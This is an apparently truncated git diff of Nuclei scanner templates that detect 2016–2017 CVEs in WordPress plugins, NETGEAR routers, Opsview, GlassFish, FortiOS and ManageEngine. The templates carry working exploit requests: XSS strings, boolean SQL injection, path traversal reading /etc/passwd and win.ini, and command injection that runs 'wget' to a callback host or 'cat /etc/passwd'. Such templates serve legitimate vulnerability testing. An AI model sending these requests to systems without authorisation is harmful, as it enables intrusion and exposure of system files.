b/nuclei-templates/CVE-2016/cve-2016-1000141.yaml new file mode 100644 index 0000000000..6450289e6c --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000141.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000141 + +info: + name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000141 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000142.yaml b/nuclei-templates/CVE-2016/cve-2016-1000142.yaml new file mode 100644 index 0000000000..2d1df9a78d --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1000142.yaml @@ -0,0 +1,37 @@ +id: CVE-2016-1000142 + +info: + name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. + reference: + - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142 + tags: cve,cve2016,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000142 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000153.yaml b/nuclei-templates/CVE-2016/cve-2016-1000153.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-1000153.yaml rename to nuclei-templates/CVE-2016/cve-2016-1000153.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-10367.yaml b/nuclei-templates/CVE-2016/cve-2016-10367.yaml index 8e41296b51..c8b0252ad6 100644 --- a/nuclei-templates/CVE-2016/cve-2016-10367.yaml +++ b/nuclei-templates/CVE-2016/cve-2016-10367.yaml @@ -5,28 +5,39 @@ info: author: 0x_akoko severity: high description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. + remediation: | + Upgrade to the latest version of Opsview Monitor Pro to fix the local file inclusion vulnerability. reference: - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774 - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 - https://nvd.nist.gov/vuln/detail/CVE-2016-10367 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-10367 cwe-id: CWE-22 + epss-score: 0.00521 + epss-percentile: 0.76355 + cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: + verified: true + max-request: 1 + vendor: opsview + product: opsview shodan-query: title:"Opsview" - verified: "true" - tags: cve,cve2016,opsview,lfi + tags: cve2016,cve,opsview,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -34,5 +45,4 @@ requests: - type: status status: - 404 - -# Enhanced by mp on 2022/08/03 +# digest: 4b0a00483046022100e45cbb5ec1e7ce9a8197b7f9cbdc7f7bfb9d89d7e983f6768c0c94b05fd91dd1022100e883d7b49b27776141743b2d5eb0b5ab4e18468dce7bf589f9a2a0b02ad0b090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-10924.yaml b/nuclei-templates/CVE-2016/cve-2016-10924.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-10924.yaml rename to nuclei-templates/CVE-2016/cve-2016-10924.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-10940.yaml b/nuclei-templates/CVE-2016/cve-2016-10940.yaml index 3898a7c31a..9cb20d013b 100644 --- a/nuclei-templates/CVE-2016/cve-2016-10940.yaml +++ b/nuclei-templates/CVE-2016/cve-2016-10940.yaml @@ -5,19 +5,32 @@ info: author: cckuailong,daffainfo severity: high description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor. reference: - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - https://nvd.nist.gov/vuln/detail/CVE-2016-10940 - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ + - https://wordpress.org/plugins/zm-gallery/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2016-10940 cwe-id: CWE-89 - tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated + epss-score: 0.00776 + epss-percentile: 0.80947 + cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* + metadata: + max-request: 3 + vendor: zm-gallery_project + product: zm-gallery + framework: wordpress + tags: cve,cve2016,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -27,17 +40,13 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 Host: {{Hostname}} - - | GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 Host: {{Hostname}} - req-condition: true - cookie-reuse: true matchers: - type: dsl dsl: @@ -46,5 +55,4 @@ requests: - 'contains(body_2, "")' - '!contains(body_3, "")' condition: and - -# Enhanced by mp on 2022/04/12 +# digest: 490a004630440220699b403999a44dfa1c0a95c442149578cb0dba8769c29aff63008cc829004d2202201090107521d760927c5f1134bbceda7facb495a7c6291a6a0669d3ca7a6832ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/cve-2016-10960.yaml b/nuclei-templates/CVE-2016/cve-2016-10960.yaml new file mode 100644 index 0000000000..7d70ef5104 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-10960.yaml @@ -0,0 +1,34 @@ +id: CVE-2016-10960 + +info: + name: wSecure Lite < 2.4 - Remote Code Execution (RCE) + author: daffainfo + severity: high + description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + reference: + - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 + tags: cve,cve2016,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2016-10960 + cwe-id: CWE-20 + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" + body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="' + + matchers-condition: and + matchers: + - type: word + words: + - "Nuclei: CVE-2016-10960" + condition: and + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1555.yaml b/nuclei-templates/CVE-2016/cve-2016-1555.yaml new file mode 100644 index 0000000000..b90433e242 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1555.yaml @@ -0,0 +1,47 @@ +id: CVE-2016-1555 + +info: + name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection + author: gy741 + severity: critical + description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. + reference: + - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE + - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 + - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic + - http://seclists.org/fulldisclosure/2016/Feb/112 + - http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-1555 + cwe-id: CWE-77 + epss-score: 0.97373 + epss-percentile: 0.99898 + cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: netgear + product: wnap320_firmware + tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev + +http: + - raw: + - | + POST /boardDataWW.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" +# digest: 4a0a0047304502202a0af6f4b5b74c37d86cf262d279ecf9a06914ec33fb6e7db00c710f0982ce60022100c68322772ed60b940af582741ea7d2816782e2641a7d654e563aa82ab3aedf98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-2389.yaml b/nuclei-templates/CVE-2016/cve-2016-2389.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-2389.yaml rename to nuclei-templates/CVE-2016/cve-2016-2389.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-3081.yaml b/nuclei-templates/CVE-2016/cve-2016-3081.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-3081.yaml rename to nuclei-templates/CVE-2016/cve-2016-3081.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-3978.yaml b/nuclei-templates/CVE-2016/cve-2016-3978.yaml index ac3ab10ad8..9c1dd44d28 100644 --- a/nuclei-templates/CVE-2016/cve-2016-3978.yaml +++ b/nuclei-templates/CVE-2016/cve-2016-3978.yaml @@ -1,27 +1,41 @@ id: CVE-2016-3978 info: - name: FortiOS (Fortinet) - Open Redirect and XSS + name: Fortinet FortiOS - Open Redirect/Cross-Site Scripting author: 0x_Akoko severity: medium - description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login." + description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login." + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, phishing attacks, and potential data theft. + remediation: | + Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability. reference: - - https://seclists.org/fulldisclosure/2016/Mar/68 + - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2016-3978 - tags: cve,cve2016,redirect,fortinet,fortios + - http://seclists.org/fulldisclosure/2016/Mar/68 + - http://www.securitytracker.com/id/1035332 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-3978 cwe-id: CWE-79 + epss-score: 0.00217 + epss-percentile: 0.59667 + cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: fortinet + product: fortios + tags: cve2016,cve,redirect,fortinet,fortios,seclists -requests: +http: - method: GET path: - - '{{BaseURL}}/login?redir=http://www.example.com' + - '{{BaseURL}}/login?redir=http://www.interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 490a0046304402201e517dd06332c852dc9e8a03d12eb20c9636dfc194690a007024ef333e978dba022062abb7e6dbc6349bc055a6faeffa048a2b20388fd1893538783af9670b6e35e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-4977.yaml b/nuclei-templates/CVE-2016/cve-2016-4977.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-4977.yaml rename to nuclei-templates/CVE-2016/cve-2016-4977.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-5649.yaml b/nuclei-templates/CVE-2016/cve-2016-5649.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-5649.yaml rename to nuclei-templates/CVE-2016/cve-2016-5649.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-6277.yaml b/nuclei-templates/CVE-2016/cve-2016-6277.yaml new file mode 100644 index 0000000000..fd2ae09625 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-6277.yaml @@ -0,0 +1,32 @@ +id: CVE-2016-6277 + +info: + name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE + author: pikpikcu + severity: high + description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. + tags: cve,cve2016,netgear,rce,iot + reference: + - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2016-6277 + cwe-id: CWE-352 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-8527.yaml b/nuclei-templates/CVE-2016/cve-2016-8527.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-8527.yaml rename to nuclei-templates/CVE-2016/cve-2016-8527.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml index 533de8e908..cff57e655a 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml @@ -1,27 +1,44 @@ id: CVE-2017-1000029 + info: - name: GlassFish Server Open Source Edition 3.0.1 - LFI + name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion author: 0x_Akoko severity: high - description: Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication. + description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. + remediation: | + Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server. reference: - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784 - - https://www.cvedetails.com/cve/CVE-2017-1000029 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037 + - https://nvd.nist.gov/vuln/detail/CVE-2017-1000029 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-1000029 cwe-id: CWE-200 + epss-score: 0.00387 + epss-percentile: 0.70348 + cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* + metadata: + max-request: 1 + vendor: oracle + product: glassfish_server tags: cve,cve2017,glassfish,oracle,lfi -requests: + +http: - method: GET path: - "{{BaseURL}}/resource/file%3a///etc/passwd/" + matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:[x*]:0:0:" + - type: status status: - 200 +# digest: 4a0a0047304502202b1ecb4a01d3db488f18d88e30890c01ab67d73172dcd959724ffd53e260af84022100d6f4a9096dc94f23108e95c441641bdee5d1b3a9ca2b8fd037cca63a94e1a6dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000163.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000163.yaml index ddc3c1f4e5..9ea899aa99 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-1000163.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-1000163.yaml @@ -1,28 +1,41 @@ id: CVE-2017-1000163 + info: - name: The Phoenix Framework versions 1.0.0 - Open redirect + name: Phoenix Framework - Open Redirect author: 0x_Akoko severity: medium - description: The Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 are vulnerable to unvalidated URL redirection, which may result in phishing or social engineering attacks. + description: Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 contain an open redirect vulnerability, which may result in phishing or social engineering attacks. + impact: | + An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks. + remediation: | + Apply the latest security patches or upgrade to a patched version of the Phoenix Framework. reference: - https://elixirforum.com/t/security-releases-for-phoenix/4143 - - https://www.cvedetails.com/cve/CVE-2017-1000163 - https://vuldb.com/?id.109587 + - https://nvd.nist.gov/vuln/detail/CVE-2017-1000163 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-1000163 cwe-id: CWE-601 - tags: cve,cve2017,redirect,phoenix + epss-score: 0.00186 + epss-percentile: 0.55009 + cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: phoenixframework + product: phoenix + tags: cve,cve2017,redirect,phoenix,phoenixframework -requests: +http: - method: GET - path: - '{{BaseURL}}/?redirect=/\interact.sh' matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - part: header +# digest: 4a0a00473045022066d0d9509969142bbfbcf0eb417da56845541044c0685547d194ebb62e0364e0022100eaeac8289ca457b4603e6babedbbca92bed9163d0b07be773a03a4e1c82b5b82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000486.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000486.yaml index 1885fac00b..dac660480f 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-1000486.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-1000486.yaml @@ -1,20 +1,22 @@ id: CVE-2017-1000486 + info: - name: Primetek Primefaces 5.x - Remote Code Execution + name: Primetek Primefaces 5.x EL Injection - RCE author: Moritz Nentwig severity: critical - description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution. + description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution reference: - https://github.com/mogwailabs/CVE-2017-1000486 - https://github.com/pimps/CVE-2017-1000486 - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 + tags: cve,cve2017,primetek,rce,injection classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2017-1000486 cwe-id: CWE-326 - tags: cve,cve2017,primetek,rce,injection + requests: - raw: - | @@ -25,10 +27,9 @@ requests: Accept-Encoding: gzip, deflate pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D + matchers: - type: word words: - 'Mogwailabs: CHECKCHECK' part: header - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2017/CVE-2017-10075.yaml b/nuclei-templates/CVE-2017/CVE-2017-10075.yaml index d5bc0d6f77..3083d00632 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-10075.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-10075.yaml @@ -1,19 +1,16 @@ id: CVE-2017-10075 info: - name: Oracle Content Server Cross-Site Scripting + name: Oracle Content Server XSS author: madrobot severity: high - description: Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. - reference: - - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html - - https://nvd.nist.gov/vuln/detail/CVE-2017-10075 - - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940 + description: The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. + reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html + tags: cve,cve2017,xss,oracle classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N - cvss-score: 8.2 + cvss-score: 8.20 cve-id: CVE-2017-10075 - tags: cve,cve2017,xss,oracle requests: - method: GET @@ -30,5 +27,3 @@ requests: words: - "" part: body - -# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2017/CVE-2017-11165.yaml b/nuclei-templates/CVE-2017/CVE-2017-11165.yaml index b1e62f3d63..5bdccda632 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-11165.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-11165.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive data, potentially compromising the confidentiality of the system. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate the information disclosure vulnerability. reference: - https://www.exploit-db.com/exploits/45094 - https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html @@ -16,12 +20,18 @@ info: cvss-score: 9.8 cve-id: CVE-2017-11165 cwe-id: CWE-200 + epss-score: 0.94336 + epss-percentile: 0.99027 + cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: datataker + product: dt80_dex_firmware shodan-query: http.title:"datataker" - verified: "true" - tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure + tags: cve2017,cve,lfr,edb,datataker,config,packetstorm,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/services/getFile.cmd?userfile=config.xml" @@ -43,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/30 +# digest: 4a0a00473045022006d394921b0d5a7e04a3fd4c15837d306fae435cd168294f0200ce3c8b85c3de022100a28cc857dd6bb3e3b7914deddd731f3d7a9a721dd521879f221cff5c81597e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-11512.yaml b/nuclei-templates/CVE-2017/CVE-2017-11512.yaml new file mode 100644 index 0000000000..8b2924e2e0 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-11512.yaml @@ -0,0 +1,50 @@ +id: CVE-2017-11512 + +info: + name: ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval + author: 0x_Akoko + severity: high + description: | + ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. + remediation: | + Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches. + reference: + - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html + - https://www.tenable.com/security/research/tra-2017-31 + - https://nvd.nist.gov/vuln/detail/CVE-2017-11512 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-11512 + cwe-id: CWE-22 + epss-score: 0.97175 + epss-percentile: 0.99794 + cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: manageengine + product: servicedesk + shodan-query: http.title:"ManageEngine" + tags: cve,cve2017,manageengine,lfr,unauth,tenable + +http: + - method: GET + path: + - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini' + - '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and +# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-11610.yaml b/nuclei-templates/CVE-2017/CVE-2017-11610.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-11610.yaml rename to nuclei-templates/CVE-2017/CVE-2017-11610.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-11629.yaml b/nuclei-templates/CVE-2017/CVE-2017-11629.yaml index 5cb529d6b9..27471932c3 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-11629.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-11629.yaml @@ -6,20 +6,31 @@ info: severity: medium description: | FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of FineCMS (>=5.0.11) which includes a fix for this 